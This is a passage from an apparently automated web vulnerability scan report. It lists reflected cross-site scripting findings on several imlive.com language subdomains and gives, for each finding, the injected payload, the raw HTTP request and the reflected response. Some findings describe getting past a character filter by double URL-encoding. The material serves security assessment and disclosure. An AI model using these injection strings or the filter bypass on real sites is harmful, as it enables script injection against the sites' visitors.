Date: Fri, 28 Jan 2011 16:45:27 GMT
Connection: close
Content-Length: 23399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.25. http://de.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8303
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=de.imlive.com&ul=/waccess/db58b'onerror='alert(1)'44c9eed88d/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://de.imlive.com:80/waccess/db58b'onerror='alert(1)'44c9eed88d/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.26. http://de.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:15 GMT
Connection: close
Content-Length: 23378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.27. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
Set-Cookie: spvdr=vd=08c8b62a-81bb-4ccd-978f-3cf95bc4ad01&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 19081
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;">
...[SNIP]...

2.28. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: spvdr=vd=3a08158f-8d99-43ce-b530-e98b6793f7a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18680
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/?669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&iy=dallas&id=44&iu=1&vd=3a08158f-8d99-43ce-b530-e98b6793f7a9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.29. http://dk.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:58 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.30. http://dk.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.31. http://dk.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work on other browsers; the underlying flaw (an unencoded reflection inside a single-quoted attribute) is browser-independent, and other payloads such as an injected event handler would reach the same reflection point.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:16 GMT
Connection: close
Content-Length: 8330
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=dk.imlive.com&ul=/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://dk.imlive.com:80/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.32. http://dk.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:53 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.33. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
Set-Cookie: spvdr=vd=903513d8-3e33-4831-96f3-029102fe04ec&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 19524
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;">
...[SNIP]...

2.34. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
Set-Cookie: spvdr=vd=ba938df6-402f-42af-9e74-39a2f773e158&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:09 GMT
Connection: close
Content-Length: 19123
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/?86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&iy=dallas&id=44&iu=1&vd=ba938df6-402f-42af-9e74-39a2f773e158';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.35. http://es.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:24 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
